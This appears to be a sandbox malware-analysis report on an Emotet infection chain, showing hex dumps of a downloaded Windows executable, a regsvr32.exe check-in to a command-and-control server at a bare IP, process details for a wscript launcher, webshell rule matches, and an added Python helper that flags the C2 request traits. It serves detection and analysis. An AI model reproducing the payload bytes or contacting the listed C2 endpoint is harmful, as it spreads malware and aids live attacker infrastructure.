2023-03-20 08:06:40 UTC | 1 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52 69 63 68 08 01 8c
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonRich
                                                                                          Data Ascii: ap(oUBGtqyB0!&?sV>r0$WCd%M.0^Px<Y44>vE7@D9$6j<youQB4+y1/>dWrbCx<2y,,A1##q1vy-mB4H&O o07(k|81@sh
                                                                                          2023-03-20 08:06:41 UTC212INData Raw: f2 30 55 48 be a6 3c 68 7c aa 92 29 70 6c 03 45 e2 44 45 54 5e 3e 77 16 20 be 00 77 18 ea 21 1d 0f dc f4 62 41 82 59 50 41 77 bd 2d 18 58 5b 75 54 42 f3 0c 17 5a cc d3 61 64 f4 1e 77 1e 47 5c 00 77 10 00 ec 7d 1b 13 f0 16 65 7b 75 c4 15 79 b7 0d 18 50 bb 6d 75 72 dc 47 ff 9d 94 33 ba 2c be 0e 77 4e 0d bc 87 1b a3 37 41 59 77 a8 b5 32 1e 80 f9 b8 f8 34 18 51 69 20 bb cd 19 c1 d8 28 f4 27 7b 4e e9 64 35 bd 16 36 07 fc 44 53 a9 2e 75 5e 3e d4 8e e3 34 53 6f d8 ad 10 b7 1c 2c d1 33 21 51 42 bd 0d df a5 2e 10 e3 7c 35 7a 92 43 55 3d c5 26 38 b2 1c 60 ae a0 34 72 c8 06 dd b3 34 68 8b 47 3c 68 b1 64 41 c4 3c 48 33 a3 0e 10 6a a5 58 6a 5b a7 00 27 5d dd d7 94 e4 4c 2f d4 c2 42 b4 c8 70 64 f8 3d cc 9e 79 40 78 bd 51 42 f5 2d 1b 6f aa 65 49 6d b4 3f 7b ab 5e c8 bb
                                                                                          Data Ascii: 0UH<h|)plEDET^>w w!bAYPAw-X[uTBZadwG\w}e{uyPmurG3,wN7AYw24Qi ('{Nd56DS.u^>4So,3!QB.|5zCU=&8`4r4hG<hdA<H3jXj[']L/Bpd=y@xQB-oeIm?{^
                                                                                          2023-03-20 08:06:41 UTC220INData Raw: 15 db 37 28 45 f0 01 4b 76 a9 65 39 fe 4e 69 60 c0 36 2d 26 8d 74 3c d2 79 70 bb 64 71 0a bf 4d 47 36 6a 00 ea 34 3d 92 fb 6e 45 37 0c d8 3d 0e 31 38 3f a0 3b 6a 09 ca 37 3c f8 3a 0c 11 3f a0 78 a8 13 62 8c 6a fd 62 6b 48 e8 2e 1d 93 13 d8 ba c8 83 16 30 d0 27 39 3f ea 1c 7a 49 82 58 6c 79 f9 49 41 d0 ef 3c 21 96 07 14 19 f1 62 6b 81 24 44 88 86 ac d9 c4 7a 64 77 2c 4b 91 b8 4a 0b 88 65 63 b7 79 ff 74 75 68 58 3c e3 65 01 da 0f 2c 05 b8 62 83 93 cd 9b ca bd 16 3e 3f 02 44 53 a9 2e 7d 25 50 d4 8e e3 34 5b cb 91 fd 09 bd 1c 24 24 e5 21 51 c3 41 50 96 ad 16 8e a6 21 15 e3 67 26 45 5c 01 73 37 e2 20 19 b4 66 51 da 08 f7 f7 92 86 99 fd b3 3a d0 7f cd 95 0c bd 1d 13 e9 26 20 96 85 f4 90 50 af 10 17 c5 26 08 07 ff 17 44 aa 04 42 2a 64 15 0f fa 2d 1c 15 b7 6d a6
                                                                                          Data Ascii: 7(EKve9Ni`6-&t<ypdqMG6j4=nE7=18?;j7<:?xbjbkH.0'9?zIXlyIA<!bk$Dzdw,KJecytuhX<e,b>?DS.}%P4[$$!QAP!g&E\s7 fQ:& P&DB*d-m
                                                                                          2023-03-20 08:06:41 UTC228INData Raw: b0 78 3c d8 49 a3 bf 7f 6d 49 f3 0d e0 d2 cd 00 61 a5 58 a9 58 a7 08 e4 19 9f 06 82 a4 54 ec 28 f0 27 92 23 59 74 71 f9 49 8a 74 5e 1b 3c da 0d 3c 00 30 75 e0 45 b2 4f fb f3 17 02 75 bc 01 98 6c e0 28 ee b6 6f 55 4a c8 0f 11 54 39 f5 71 b2 d4 d3 0e 21 51 c7 f4 3c 3e 61 1e eb da 72 33 7a 53 cf 0d ca bb ac 93 56 3e 39 3f c2 4f 9f be bc f2 31 b6 ee c9 59 3c e9 7d e6 63 3b fe 03 58 27 ac 65 e8 21 f2 fb 16 e1 1c c9 bb ac 43 2e a2 57 b6 6e b6 da de 51 d1 5d f0 0d fb 06 f2 11 7b e6 14 9d 1d 92 33 62 aa 65 be 61 b4 37 8c 28 f1 c2 e8 92 45 b4 6c b8 7a f4 94 03 41 43 b4 01 ae 12 50 08 3c af 75 fa 4e 59 34 48 f2 07 b0 04 e0 21 ee 95 f9 d9 ba bc 09 88 df 8a dd e0 8b b4 5d 49 8b 92 dc 77 bb b9 d5 5c b5 25 eb e0 3c 99 36 c9 46 b9 b0 fb 6e 64 f2 3f 80 40 02 37 44 92 4d
                                                                                          Data Ascii: x<ImIaXXT('#YtqIt^<<0uEOul(oUJT9q!Q<>ar3zSV>9?O1Y<}c;X'e!C.WnQ]{3bea7(ElzACP<uNY4H!]Iw\%<6Fnd?@7DM
                                                                                          2023-03-20 08:06:41 UTC236INData Raw: 11 0e fd 0e 71 53 28 82 62 c6 c0 d4 f2 1f a6 47 41 7e c9 d7 0e 59 3c 81 c7 df ae bd 7c c5 7e 8d 83 73 d5 9a ca 3b d8 e0 ac d1 ba ac d7 e8 18 de 3d 5f 7b da e2 38 35 74 98 ae c2 a6 c3 20 bd 6c 86 aa 62 de cd 9d 23 89 22 7c 7d ff 93 52 93 7f c9 1e c7 23 ee ea d7 22 c8 9d be a8 fd f7 0c 9f 3f 2d 36 d0 4f a9 51 42 dd ee cd 9d 94 48 ec 29 da 92 6d bf bb c8 af fe ef 2e d2 04 c9 2b 71 2a cc 06 2a 38 fc 35 33 d8 79 df 07 41 ae bd 7c c1 77 46 43 c1 0c d3 38 fb 26 91 7f 44 08 35 a9 1e d2 44 70 6b 17 a5 04 fc 55 ec 71 78 fd 34 83 6a b1 54 ee 2a 38 46 33 a5 2e bb e8 3b 35 7a d2 53 fe ee 7b 64 35 ea 20 82 cf 75 8e 9d c0 36 8e 67 3f 4b 21 9e 79 17 73 6f 51 42 b5 3d 4c 35 12 08 ec e5 70 05 53 6a ba c8 85 3e 57 61 e4 4c 40 ac 71 4e 41 c8 70 0b 35 f3 79 e2 b7 3d 8f aa 1c
                                                                                          Data Ascii: qS(bGA~Y<|~s;=_{85t lb#"|}R#"?-6OQBH)m.+q**853yA|wFC8&D5DpkUqx4jT*8F3.;5zS{d5 u6g?K!ysoQB=L5pSj>WaL@qNAp5y=
                                                                                          2023-03-20 08:06:41 UTC244INData Raw: dc 9e 78 4c 00 c4 da 42 34 c9 77 46 5b c6 ae 64 35 11 17 02 75 72 cd 17 0c 5b dd 7c 1f fc 35 e3 35 67 05 2d 9f 2d 3c 9e 78 4c 04 c7 57 42 34 c3 7f 46 5f f7 80 a5 df 7f da 72 61 03 fe 7b 28 6b 65 b8 4b 0f 45 23 42 4d 35 ff 35 5c 08 d2 78 4c 00 c9 ef a8 cb b7 7b e9 a3 48 e4 a4 41 70 eb 08 c8 37 44 ba 51 94 9a c6 87 12 79 62 41 7e 0c 7c 71 78 48 54 d5 00 cf de ae 0a bd 31 13 2a e2 59 71 2c be bb 1b ad 19 13 24 1b ab af 35 66 fc e7 39 eb 1d 67 3d 3c f8 14 18 49 74 e1 44 05 49 15 7c cb df 32 e0 84 45 f4 35 7a 53 ad e9 13 c4 53 28 6b 2c b2 e7 a2 35 46 71 c8 b1 50 f9 78 3c 59 74 e3 ca a8 15 66 1c c1 5f 46 4b 48 ea 95 dd 7f b6 d9 ba 7f cf 56 56 91 65 39 f8 6f 55 2a bc 01 35 74 b6 3c 18 15 a1 f3 30 21 19 c7 f4 3d 5f a5 2f 24 21 b5 23 7a 53 9f 27 52 03 c8 69 d2 7c
                                                                                          Data Ascii: xLB4wF[d5ur[|55g--<xLWB4F_ra{(keKE#BM55\xL{HAp7DQybA~|qxHT1*Yq,$5f9g=<ItDI|2E5zSS(k,5FqPx<Ytf_FKHVVe9oU*5t<0!=_/$!#zS'Ri|
                                                                                          2023-03-20 08:06:41 UTC251INData Raw: fd 90 99 53 28 82 7e c6 c0 d4 b6 27 46 23 e5 74 71 f9 79 5e cb b4 30 21 d0 0f 33 03 ed 14 36 81 14 63 6a 85 24 7b 82 72 bf 58 f3 6b 65 e8 5a d0 f0 2f ba 20 a6 5a 46 f9 49 a2 13 c4 14 16 96 07 db a8 28 62 6b 6b 24 8b 20 f3 16 c9 c4 72 ab 32 0e 94 9a b8 7a c4 4a 12 41 43 b4 01 9e 0f 12 58 3c af 75 d2 58 00 34 48 b2 27 98 67 b4 64 35 11 16 d5 5a be 01 a0 a9 1e 96 fe 48 76 f5 e3 34 b0 98 fc 0b fc fb 1c c3 ef 57 21 51 83 51 b7 31 09 2e ff 4d ed 70 85 eb eb 89 fb 88 d2 5d 94 ae 36 76 2b b6 27 42 45 ac 74 71 f3 71 5a cb 89 f1 cb 57 cb 61 4b b2 27 68 d5 ff 9b ca fb 26 25 52 53 ba ac ef 2e 92 9a 9e 2b 71 e9 04 b4 b8 78 31 b9 dd 5c b5 25 c7 a0 24 b5 e2 9c c2 75 ea 75 96 51 26 b5 44 ad 00 c0 cd 17 0c 0b ee 7c 3c a2 35 46 19 c8 70 8b f8 3c 18 09 b7 2d 37 a8 15 66 7c
                                                                                          Data Ascii: S(~'F#tqy^0!36cj${rXkeZ/ ZFI(bkk$ r2zJACX<uX4H'gd5ZHv4W!QQ1.Mp]6v+'BEtqqZWaK'h&%RS.+qx1\%$uuQ&D|<5Fp<-7f|
                                                                                          2023-03-20 08:06:41 UTC259INData Raw: 3a 68 30 32 01 4a 34 8f b6 7a 6d 00 61 6f 8a 7a 53 a7 c0 2f 42 53 28 b7 51 c6 c0 aa c4 7a 47 43 35 ba d9 8f c3 d2 b9 70 36 21 51 06 bf cd 13 64 6b 00 ea f1 1d 7c 53 26 ce ba 54 55 28 6b ec 7d 1b 0b 99 d7 ce bd ca 9d 5f 7d 3c 59 fb ed 28 27 51 42 45 07 33 62 ea 85 79 62 35 7a 7f 07 45 37 85 fe 30 6d 65 39 30 aa c4 7a 47 43 35 49 f2 0d 2c d8 b9 70 36 21 51 5d 30 b7 cc e3 de 18 67 64 35 55 ea 54 55 f0 c1 73 2e 6b 65 33 ac 2b 71 e3 cc 63 33 74 71 be c7 26 af e9 b5 01 57 42 34 dc b7 62 6b 81 d4 44 33 7a 53 ee ff b5 d7 94 ad 7b 63 39 3f 99 28 62 41 82 90 64 77 78 3c 54 bd dd 20 27 51 42 52 21 3a b6 00 85 71 62 35 7a 62 af c0 27 42 53 28 00 e0 29 39 2b 71 7c c8 c6 25 72 71 78 bd ec 2c 6e 30 21 c0 7d 94 a4 f4 e7 43 06 61 64 f5 aa 53 26 2e b2 6c 55 28 6b 58 b0 ba
                                                                                          Data Ascii: :h02J4zmaozS/BS(QzGC5p6!Qdk|S&TU(k}_}<Y('QBE3byb5zE70me90zGC5I,p6!Q]0gd5UTUs.ke3+qc3tq&WB4bkD3zS{c9?(bAdwx<T 'QBR!:qb5zb'BS()9+q|%rqx,n0!}CadS&.lU(kX
                                                                                          2023-03-20 08:06:41 UTC267INData Raw: c5 27 0c 2f 37 a1 49 c4 b6 26 65 03 7a 74 71 78 bd 2d 18 28 96 8d 6d ac b5 04 17 22 1e a4 40 46 5e 3e 77 66 71 be 00 77 68 aa 09 1d 7f 25 f0 16 65 03 62 65 7b 78 b7 1d 18 28 bb 65 75 06 dc 95 a2 9c 94 48 e8 61 db e7 53 26 01 bc 89 1f a3 a8 2d b2 e9 63 fa ad 0d ce 69 50 11 31 b7 02 2c 21 bb 4a 49 0b bf 3b 13 2b e0 e3 3e 2c ca 9a 9f ea 05 64 0c d0 c4 5b 2c b2 e7 c3 eb e5 be bc 7d ff 74 c3 a1 59 3c af 74 05 09 2f 97 48 33 a5 2f 24 3d a5 87 7a 53 6e c0 f7 31 05 ef 2f 41 61 62 78 71 62 f8 21 50 33 ea 39 85 d8 1c f6 b7 e0 35 66 6c 47 f2 0e 4f 58 62 a5 51 5e 0b 2a c4 43 60 0b 62 3c 67 64 f8 6f 55 42 7a 69 35 74 f0 3c 18 79 df c0 cf de d0 36 10 68 3b 9a 94 ff ea 20 11 5a d8 62 61 6f ac 64 b9 95 9a 71 b6 2e 21 ff 41 43 7d ff ba 30 bf 9d 0c 33 78 de b1 8e 7c c1 6f
                                                                                          Data Ascii: '/7I&eztqx-(m"@F^>wfqwh%ebe{x(euHaS&-ciP1,!JI;+>,d[,}tY<t/H3/$=zSn1/Aabxqb!P395flGOXbQ^*C`b<gdoUBzi5t<y6h; Zbaodq.!AC}03x|o
                                                                                          2023-03-20 08:06:41 UTC275INData Raw: 14 02 1e 4a 22 8f 77 46 43 ba 18 9b 60 bd 17 02 7d 15 0b cb 21 ac 21 1d 1f 03 33 62 41 82 51 50 51 73 bd 1d 18 48 9c dc 51 42 b5 3c 17 42 75 d6 7a 66 be 3e 77 06 cc 73 60 73 a3 27 41 11 b4 6f 55 52 72 8b 74 fd 79 bf 78 7d 1c f5 06 21 51 c3 78 6c 13 ec 4f 34 af e5 41 5e 73 0b 98 0a 8a d8 6c 4f 45 b0 7b 0f 51 e9 0d 67 0d ff 75 5c 0f 91 7d e1 78 25 96 06 10 68 7c d0 6b 00 e0 20 11 5a 8f 93 ba c8 c5 27 0c 4b fc ba 36 2b fa 26 65 63 bc 30 55 58 74 da f8 70 f3 ed 9d 8e 7c c1 6f 46 7b 55 37 33 74 2f 12 70 0d ba 28 77 e1 23 e4 d5 9f 2b 71 62 09 c8 44 6c b6 3d 5b c9 0d 68 30 e6 14 25 c7 68 33 62 ea 45 06 b2 69 85 ac 67 fd be cc db a0 23 ee c0 be 5e 16 20 e6 46 97 35 fa b8 85 58 3c 68 30 aa 04 25 c3 aa f2 88 6f 89 34 03 b4 0f 34 ad 83 e3 84 d2 5d 0c d8 09 ca e8 81
                                                                                          Data Ascii: J"wFC`}!!3bAQPQsHQB<Buzf>ws`s'AoURrtyx}!QxlO4A^slOE{Qgu\}x%h|k Z'K6+&ec0UXtp|oF{U73t/p(w#+qbDl=[h0%h3bEig#^ F5X<h0%o44]
                                                                                          2023-03-20 08:06:41 UTC283INData Raw: 28 ea 28 19 4b 37 00 ce 2a 06 15 17 f8 3d 1c d8 49 48 4e 4f bf ed f3 0d 2b a4 35 00 61 0f 70 62 42 af 00 2f fc b2 ab 64 5b b2 72 33 86 83 80 a9 36 fd 24 60 bd 2c 24 c6 07 23 51 85 71 60 04 f5 6b 00 0a 21 1d 25 da 63 6d b6 31 7b d9 a0 51 39 b4 6e 59 eb 05 67 0d ff 34 98 b5 1d 18 58 bb 64 41 06 bf 05 2b 26 e0 45 41 ef 60 9e da 62 61 1f 0c de 6d 83 dc 3f 3f 2b 71 2a c8 07 11 54 99 81 d3 a4 c3 20 b3 e5 31 1f f7 84 ff ae 27 8b bd 2d bc 21 5b 6f cc 5c 54 1a a1 18 7d 70 b6 50 51 23 17 0b b4 98 f1 78 3c 59 b7 ec 14 f9 51 42 34 00 b8 d6 4f e0 61 64 35 32 d8 8a 61 ff 44 53 28 2f ee 8d 1b 9b 71 62 41 84 71 50 29 7c 3c 59 3c 21 b9 52 99 cb 70 6c 7b e9 ef 24 b1 64 35 7a 1a ad 9d be 00 77 68 e0 e1 1d ff 2b 71 62 08 ca 5e c4 f8 3c 18 69 b7 ec 14 99 51 42 34 00 b8 98 e2
                                                                                          Data Ascii: ((K7*=IHNO+5apbB/d[r36$`,$#Qq`k!%cm1{Q9nYg4XdA+&EA`bam??+q*T 1'-![o\T}pPQ#x<YQB4Oad52aDS(/qbAqP)|<Y<!Rpl{$d5zwh+qb^<iQB4
                                                                                          2023-03-20 08:06:41 UTC290INData Raw: 10 52 30 c9 76 4a 60 2e 9e 9b be 37 7b ab 51 be 85 b1 2c e2 30 11 be 5e 59 a2 b0 81 ca b3 34 58 e9 d9 3c 68 f1 4c 71 44 b5 0d 13 a7 12 00 61 ef 78 5a a4 c7 6e fd fc ec 7e a4 6b e8 d6 28 bb a3 a8 46 bc 39 51 f9 71 79 d4 9b 84 2b d0 37 14 1d b4 d2 61 c7 24 54 07 47 53 26 ce 7a 74 a4 c9 40 af e8 d6 28 bb a3 a8 45 bc 39 41 f9 49 69 a2 46 33 21 96 07 2c 46 a6 62 6b c1 04 7c 36 fb 16 3e 5b 7e 44 53 a9 1e 7d d0 1c 27 71 e9 04 5b 71 ff 34 48 b7 0c 1c e3 7d 09 1d c9 ff c1 77 46 4b e8 39 76 cb 85 1b a5 81 0f 1f 0e eb ac 20 21 e2 1d 71 62 2a 06 2d 30 f8 3d 24 d8 79 70 c3 f6 ae bd b5 3d 2b 7e a4 0c 61 a3 70 5a 91 91 45 37 c5 1e 08 89 b2 c1 1a 40 34 42 54 ca 70 54 f0 0d 1c c7 d3 0b 2d aa 14 62 bf 0d 2b 8a a9 d4 9f 9b f2 3f 73 01 d4 37 44 d2 65 4b 55 d2 56 4c b0 0f 61
                                                                                          Data Ascii: R0vJ`.7{Q,0^Y4X<hLqDaxZn~k(F9Qqy+7a$TGS&zt@(E9AIiF3!,Fbk|6>[~DS}'q[q4H}wFK9v !qb*-0=$yp=+~apZE7@4BTpT-b+?s7DeKUVLa
                                                                                          2023-03-20 08:06:41 UTC298INData Raw: 7d 78 f8 6f 55 52 5f 74 35 74 f0 34 18 69 bc a2 90 0d e9 f7 b5 06 28 e3 2f 24 51 cd 2c 7a 53 ad 09 13 74 a4 c9 aa 8f 3a b6 7f 55 52 c0 37 11 44 81 b1 a5 59 b7 2c 14 11 d8 06 10 78 b8 2e 4f 38 ea 20 11 3a 60 ee 04 be 4c 94 6c 4f 55 09 4e 2b 71 e3 05 67 05 9c 9e 87 c3 d8 48 4c 00 62 ac 43 34 c3 77 46 5b 89 25 40 05 f1 1f 02 0d bc 40 77 1b a3 24 b0 77 2f b6 26 65 73 45 77 71 78 bd 1d 18 58 dc 74 ae bd b5 3c 17 52 6c c5 9f 9b be 3e 77 16 cc 73 60 63 60 e8 a1 11 fc e7 39 eb 1d 67 3d 21 27 2f 7d 0f 7d 3f 78 ac 3d 66 84 00 b2 8e 3b 01 61 64 7d f1 ce ae 45 37 44 1b a3 de ed 39 3f 2b 35 e9 f4 cb 35 74 71 4b fc 9e 78 4c 00 5b 2f 42 34 04 b8 9b e2 44 45 5c 8d 74 9c 26 45 f0 00 77 1c 96 6e 39 3f 18 8e 5f 1a 4f 35 74 7e fc 0f 5a 3c 68 0d b2 06 42 34 47 b7 c7 69 00 61
                                                                                          Data Ascii: }xoUR_t5t4i(/$Q,zSt:UR7DY,x.O8 :`LlOUN+qgHLbC4wF[%@@w$w/&esEwqxXt<Rl>ws`c`9g=!'/}}?x=f;ad}E7D9?+55tqKxL[/B4DE\t&Ewn9?_O5t~Z<hB4Gia
                                                                                          2023-03-20 08:06:41 UTC306INData Raw: 6e 2d 32 62 cf a5 63 64 69 1f 52 26 6f 51 45 53 98 ce 67 39 13 4d 70 62 24 29 34 74 cd dd 3e 59 54 02 31 21 8f 28 35 48 fb c7 69 00 81 0e 34 7a 3e 4a 44 37 94 f6 2a 6b 15 55 3e 2b 82 0d 40 43 dd d1 73 78 c8 36 3d 68 aa 51 50 42 e8 e9 31 62 f7 70 60 64 22 0f 52 26 b9 92 46 53 30 1e 64 39 9a 5d 70 62 e9 e2 37 74 d9 0e 3d 59 04 ef 31 21 41 e4 36 48 0b e5 6a 00 28 ec 34 7a 73 83 47 37 08 db 29 6b 4a b0 3e 2b 5d c2 43 43 05 fd 70 78 17 d3 3d 68 2c 81 53 42 18 c2 32 62 d3 8b 60 64 41 d8 51 26 fd bc 45 53 76 e6 64 39 97 8a 73 62 21 ce 34 74 79 f6 3d 59 10 ce 32 21 59 cc 35 48 03 ed 6a 00 31 c4 37 7a 63 a9 44 37 81 dc 29 6b 49 99 3d 2b b9 ed 40 43 17 e0 70 78 04 ff 3e 68 14 b5 50 42 37 dd 32 62 53 a3 63 64 31 ef 52 26 9d a2 45 53 ec cb 67 39 e7 be 70 62 93 d5 34
                                                                                          Data Ascii: n-2bcdiR&oQESg9Mpb$)4t>YT1!(5Hi4z>JD7*kU>+@Csx6=hQPB1bp`d"R&FS0d9]pb7t=Y1!A6Hj(4zsG7)kJ>+]CCpx=h,SB2b`dAQ&ESvd9sb!4ty=Y2!Y5Hj17zcD7)kI=+@Cpx>hPB72bScd1R&ESg9pb4
                                                                                          2023-03-20 08:06:41 UTC311INData Raw: 0d 0a
                                                                                          Data Ascii:
                                                                                          2023-03-20 08:06:41 UTC311INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49737 | 164.90.222.65 | 443 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 08:08:11 UTC | 311 | OUT | POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: 164.90.222.65
2023-03-20 08:08:11 UTC | 311 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 20 Mar 2023 08:08:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2023-03-20 08:08:11 UTC | 311 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
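The session 3 exchange above is the whole C2 check-in: a POST with no body, no User-Agent, a bare IP in the Host header and a random-looking path, answered with an empty chunked body. The following triage helper is an added example written for this report; it is not Joe Sandbox code and not Emotet code. It parses raw HTTP/1.1 messages as the report prints them and lists those traits. The 8-letter segment threshold and the indicator wording are assumptions; the benign GET is a constructed contrast case.

```python
"""
Added example for triaging the session 3 exchange above; it is not part of the
Joe Sandbox report and not Emotet code. It parses a raw HTTP/1.1 message as the
report prints it and lists what makes the POST stand out: no User-Agent, an
empty body, a bare IPv4 address in Host, and a path built only from lowercase
letter runs. The 8-letter threshold and the indicator wording are assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass, field


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)  # header names lower-cased
    body: str = ""


def parse_http(raw: str) -> HttpMessage:
    """Split a raw HTTP/1.1 message (CRLF or LF) into start line, headers and body."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.strip("\n").split("\n")
    msg = HttpMessage(start_line=lines[0].strip(), body=body)
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            msg.headers[name.strip().lower()] = value.strip()
    return msg


def decode_chunked(body: str) -> str:
    """Decode a chunked body; the report's '0\\r\\n\\r\\n' terminator yields ''."""
    out, rest = [], body.replace("\r\n", "\n")
    while rest:
        size_line, _, rest = rest.partition("\n")
        size = int(size_line.split(";")[0].strip() or "0", 16)
        if size == 0:
            break
        out.append(rest[:size])
        rest = rest[size:].lstrip("\n")
    return "".join(out)


RANDOM_SEGMENT = re.compile(r"^[a-z]{8,}$")  # assumption: 8+ lowercase letters, no extension


def request_indicators(req: HttpMessage) -> list[str]:
    """Return the suspicious traits of a request; an empty list means nothing flagged."""
    method, _, rest = req.start_line.partition(" ")
    path = rest.split(" ")[0]
    flags = []
    if "user-agent" not in req.headers:
        flags.append("no User-Agent header")
    if method == "POST" and req.headers.get("content-length") == "0":
        flags.append("POST with empty body")
    host = req.headers.get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)
        flags.append("Host header is a bare IP address")
    except ValueError:
        pass  # a hostname, or no Host header at all
    segments = [s for s in path.split("/") if s]
    if segments and all(RANDOM_SEGMENT.match(s) for s in segments):
        flags.append("path is only random-looking lowercase segments (weak signal alone)")
    return flags


# Request and response copied from the session 3 exchange printed above.
EMOTET_POST = (
    "POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Length: 0\r\n"
    "Host: 164.90.222.65\r\n"
    "\r\n"
)
EMOTET_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Date: Mon, 20 Mar 2023 08:08:11 GMT\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Connection: close\r\n"
    "\r\n"
    "0\r\n\r\n"
)
# Constructed benign request for contrast; not from the report.
BROWSER_GET = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for raw in (EMOTET_POST, BROWSER_GET):
        req = parse_http(raw)
        print(req.start_line, "->", request_indicators(req) or "nothing flagged")
    resp = parse_http(EMOTET_RESPONSE)
    print("response body bytes:", len(decode_chunked(resp.body)))
```

Each indicator is weak on its own (plenty of tooling posts to bare IPs without a User-Agent); the value is in the combination, and in the fact that the traffic originates from regsvr32.exe, which has no business talking HTTP at all.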


                                                                                          Target ID:0
                                                                                          Start time:09:06:33
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail
                                                                                          Imagebase:0x7ff64d520000
                                                                                          File size:41778000 bytes
                                                                                          MD5 hash:CA3FDE8329DE07C95897DB0D828545CD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate

                                                                                          Target ID:1
                                                                                          Start time:09:06:34
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
                                                                                          Imagebase:0x7ff7e91a0000
                                                                                          File size:165888 bytes
                                                                                          MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
